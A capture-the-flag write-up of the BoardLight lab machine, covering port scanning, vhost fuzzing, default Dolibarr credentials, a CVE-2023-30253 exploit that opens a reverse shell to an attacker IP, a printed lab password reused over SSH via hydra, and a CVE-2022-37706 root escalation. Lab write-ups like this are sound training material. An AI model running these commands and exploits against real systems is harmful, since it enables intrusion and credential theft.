Overview

BoardLight is an easy Linux machine that demonstrates how virtual host enumeration can uncover a vulnerable Dolibarr instance, where default credentials lead to authenticated code execution and eventual root access through a vulnerable Enlightenment SUID binary.

Attack Chain

  • Enumerate exposed services and identify SSH (22) and HTTP (80)
  • Discover the board.htb domain from the web application
  • Fuzz virtual hosts and identify crm.board.htb
  • Log in to Dolibarr 17.0.0 with default credentials
  • Exploit CVE-2023-30253 for authenticated remote code execution
  • Gain a shell as www-data
  • Recover database credentials from conf.php
  • Reuse the password to authenticate as larissa over SSH
  • Identify vulnerable Enlightenment SUID binaries
  • Exploit CVE-2022-37706 to gain a root shell

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.231.37; export NAME=BOARDLIGHT; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -A -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

22,80

nmap results

Findings

The scan reveals a small attack surface with SSH (22) and HTTP (80) exposed. Since SSH usually requires valid credentials, the web service becomes the primary enumeration target.

Web Enumeration

Main Website

Browsing to port 80 shows a basic website for a cybersecurity company.

main website

While reviewing the site, the What we do section reveals the domain board.htb. This is added to /etc/hosts so the site can be resolved by hostname.

echo "$IP board.htb" | sudo tee -a /etc/hosts

domain discovery

Virtual Host Fuzzing

With the domain identified, we fuzz for additional virtual hosts using ffuf.

ffuf -u http://board.htb -c -ic -H "HOST: FUZZ.board.htb" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -t 100 -mc all -fw 6243

The scan identifies a subdomain called crm.

ffuf vhost

The new virtual host is added to /etc/hosts.

echo "$IP crm.board.htb" | sudo tee -a /etc/hosts

Dolibarr CRM

Browsing to http://crm.board.htb reveals a Dolibarr 17.0.0 application.

dolibarr login

Trying common default credentials succeeds with admin:admin.

dolibarr admin login

This is important because Dolibarr 17.0.0 is affected by CVE-2023-30253, an authenticated vulnerability that can be abused to execute code by injecting PHP into editable content.

Foothold

Dolibarr Authenticated RCE

Although the issue can be exploited manually by injecting PHP into HTML content, I used a public proof-of-concept for CVE-2023-30253.

https://github.com/Rubikcuv5/cve-2023-30253

After cloning the repository and activating a Python 3.11 virtual environment, the exploit is ready to run.

exploit setup

A penelope listener is started on port 443, and the exploit is executed with the default Dolibarr credentials.

python CVE-2023-30253.py -u admin -p admin -r 10.10.14.137 443

exploit execution

The exploit returns a shell as www-data.

www-data shell

Lateral Movement

Configuration File Enumeration

From the web shell, the Dolibarr configuration directory is inspected. Inside /var/www/html/crm.board.htb/htdocs/conf, the file conf.php stands out.

conf php location

Reading the file reveals stored database credentials.

conf php credentials

The recovered password is:

serverfun2$2023!!

Password Reuse Against SSH

After obtaining the credentials from the configuration file, we need to identify a valid user on the system to test them against.

One way to do this is by listing the contents of /home:

ls /home

Alternatively, we can inspect /etc/passwd to identify users with valid shell access:

cat /etc/passwd | grep -E "sh$"

From this, we identify the user larissa.

The password is then tested against this user over SSH using hydra:

hydra -l larissa -p "serverfun2\$2023\!\!" $IP ssh

The credentials are valid.

hydra ssh success

larissa:serverfun2$2023!!

With the password confirmed, we connect over SSH.

ssh larissa@$IP

This gives us an interactive shell as larissa.

larissa ssh shell

The user flag can now be read.

cat /home/larissa/user.txt

user flag

Privilege Escalation

LinPEAS Enumeration

After gaining access as larissa, linpeas.sh is executed to look for local privilege escalation paths.

The output highlights several Enlightenment binaries with the SUID bit set.

linpeas enlightenment suid

We check the installed version.

enlightenment --version

The target is running Enlightenment 0.23.1.

enlightenment version

This version is vulnerable to CVE-2022-37706. The issue affects enlightenment_sys before version 0.25.4, where a setuid root binary mishandles pathnames beginning with /dev/.., allowing local privilege escalation.

Exploiting CVE-2022-37706

A public exploit is available on GitHub.

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

The exploit is transferred to the target.

transfer exploit

Running the exploit returns a root shell.

root shell

The root flag can now be read.

cat /root/root.txt

root flag

Key Takeaways

BoardLight shows how a small web-facing attack surface can still lead to full compromise. Virtual host enumeration exposed the CRM application, default credentials allowed access to a vulnerable Dolibarr version, and a configuration file disclosed reusable credentials for SSH. The final escalation came from an outdated SUID Enlightenment binary vulnerable to CVE-2022-37706.